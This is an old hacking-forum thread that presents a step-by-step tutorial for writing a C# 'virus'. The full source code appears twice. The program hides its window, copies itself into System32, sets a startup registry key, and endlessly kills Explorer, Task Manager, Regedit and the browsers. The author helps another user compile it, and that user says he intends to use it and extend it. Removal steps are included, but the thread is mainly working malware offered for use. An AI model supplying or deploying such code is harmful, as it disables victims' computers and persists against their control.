Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Main › General › Spammers Corner › [Tutorial] Programming your own FSEK Virus

Post[Tutorial] Programming your own FSEK Virus

Posts 1–15 of 20 · Page 1 of 2
FluffyStuff
FluffyStuff
[Tutorial] Programming your own FSEK Virus
Well since l0ngcat showed everyone a tutorial on how to make a trainer i thought i would show you how to make a virus. It took me 30 minutes and is programmed in C# (Newer and easier version of C++).
A basic explanation of what it does is that it copies itself to the system32 folder and creates a registry key so it runs on startup but the main function is to close explorer, internet explorer, firefox, task manager and the registry editor processes. It is not distructive in any way (it doesnt delete explorer or anything, it only closes the process).
How to compile? Simply download C# (express edition is free) and insert this code into the main form load function and compile (Not Run!!).
Feel free to change it but keep the name.


Code:
//Fluffy Simple Explorer Killer Virus - Version 1.0.0
private void Form1_Load(object sender, EventArgs e)
{
	this.Visible = false; //Make the window invisible
	this.ShowInTaskbar = false;
	if (Application.StartupPath != Environment.GetFolderPath(Environment.SpecialFolder.System)) //If this file isnt in the system32 directory....
	{
		try
		{
			FileInfo me = new FileInfo(Application.ExecutablePath); //This file
			me.MoveTo(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\fsekv.exe"); //...then move this file to C:\Windows\System32\fsekv.exe (Default path)
			RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true); //Registry info
			key.SetValue("fsekv", "\"" + Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\fsekv.exe\""); //Create the registry key making the virus run on startup
		}
		catch { }
	}
	while (true)
	{
		try
		{
			Process[] pros = Process.GetProcesses(); //Get info of all processes
			foreach (Process pro in pros)
			{
				if (pro.ProcessName == "explorer" || pro.ProcessName == "regedit" || pro.ProcessName == "iexplore" || pro.ProcessName == "firefox" || pro.ProcessName == "taskmgr") //If the inspected process has one of these names...
				{
					pro.Kill(); //...then kill it
				}
			}
			Thread.Sleep(10);
		}
		catch { }
	}
}
How to remove? Start windows in safe mode (F8 on while booting) and simply delete fsekv.exe from C:\Windows\System32 and delete the key from the registry (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run).
#1 · 19y ago
CO
condor01
Thanks so much i will have good fun with this lol will this make it into an exe or will it self install?
#2 · 19y ago
FluffyStuff
FluffyStuff
I dont quite get what you mean with self install..... an installing virus? The complied outcome is just a single .exe file and if you open it your pc is instantly pwned.
#3 · 19y ago
CO
condor01
Thanks. Ill explain, With most virus you get they are put in your comp without you knowing so installs its self without you clicking on it. Understand?
#4 · 19y ago
FluffyStuff
FluffyStuff
Those are not viruses, that are backdoors, and no thats not with most viruses its only with onces lauched auto by diskette or CD or a script from internet which might download a virus which is rather uncommon, the most common type of virus is a trojan horse (usually a virus binded with another program but you would still be clicking on it though you wouldnt realize that it is a virus).
#5 · 19y ago
CO
condor01
OH sorry . Still ill have good fun i can edit this and add more process to kill cant I? I think i'm the only one who is impressed lol.
#6 · 19y ago
FluffyStuff
FluffyStuff
Yes, its no problem just insert another || pro.ProcessName == "XXXXXXX" and the name you want (without extension) and i didnt intend this to be special, it just a tutorial to get people started.
#7 · 19y ago
CO
condor01
Sweet I Know but you can use this for a lot more and I also thought it would be nice to Give you a Thanks.

Good Job

Condor01
#8 · 19y ago
CO
condor01
Ive got a problem. Where is Load and Compile? I cant seem to find it.
#9 · edited 19y ago · 19y ago
FluffyStuff
FluffyStuff
Double click anywhere on the form and you get sent to the code area and there is a load function, now just replace it with my code. And compile is in the menu -> Build. And the .exe file is located in your documents -> Visual Studio -> Projects.
#10 · 19y ago
CO
condor01
i get 2 errors:

1.Invalid token '{' in class, struct, or interface member declaration
2.Type or namespace definition, or end of file expected

help
#11 · 19y ago
FluffyStuff
FluffyStuff
You have one '{' too much, just replace the form_load function with mine (dont paste it inside it, replace it).
#12 · 19y ago
CO
condor01
I dont understand it just cant find where to put it in HELP.
#13 · 19y ago
FluffyStuff
FluffyStuff
Its not that hard..... just double click anywhere on the form and delete everything in the namespace (where you get sent to after double clicking) and put this instead.
And be sure to start a windows application not a console application.

Code:
public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
        //Fluffy Simple Explorer Killer Virus - Version 1.0.0
        private void Form1_Load(object sender, EventArgs e)
        {
            this.Visible = false; //Make the window invisible
            this.ShowInTaskbar = false;
            if (Application.StartupPath != Environment.GetFolderPath(Environment.SpecialFolder.System)) //If this file isnt in the system32 directory....
            {
                try
                {
                    FileInfo me = new FileInfo(Application.ExecutablePath); //This file
                    me.MoveTo(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\fsekv.exe"); //...then move this file to C:\Windows\System32\fsekv.exe (Default path)
                    RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true); //Registry info
                    key.SetValue("fsekv", "\"" + Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\fsekv.exe\""); //Create the registry key making the virus run on startup
                }
                catch { }
            }
            while (true)
            {
                try
                {
                    Process[] pros = Process.GetProcesses(); //Get info of all processes
                    foreach (Process pro in pros)
                    {
                        if (pro.ProcessName == "explorer" || pro.ProcessName == "regedit" || pro.ProcessName == "iexplore" || pro.ProcessName == "firefox" || pro.ProcessName == "taskmgr") //If the inspected process has one of these names...
                        {
                            pro.Kill(); //...then kill it
                        }
                    }
                    Thread.Sleep(10);
                }
                catch { }
            }
        }
    }
#14 · edited 19y ago · 19y ago
fastbullet
fastbullet
fuck all this i like fake viruses what turn your computer off D:
#15 · 19y ago
Posts 1–15 of 20 · Page 1 of 2

Post a Reply

Similar Threads

  • [Tutorial] Change your IP to unban yourselfBy Super-Man in Game Hacking Tutorials
    3Last post 6y ago
  • [Video tutorial] Make your own css cheatsBy seren1ty in CounterStrike (CS) 1.6 Hacks / Counter Strike: Source (CSS) Hacks
    6Last post 19y ago
  • [Tutorial] How to make your own undetected module in VB6By markfracasso11 in Visual Basic Programming
    17Last post 18y ago
  • [Tutorial] How to make your own undetected module in VB6By markfracasso11 in WarRock - International Hacks
    22Last post 19y ago
  • How to make your own radiostation?By nasir91 in General
    3Last post 19y ago

Tags for this Thread

None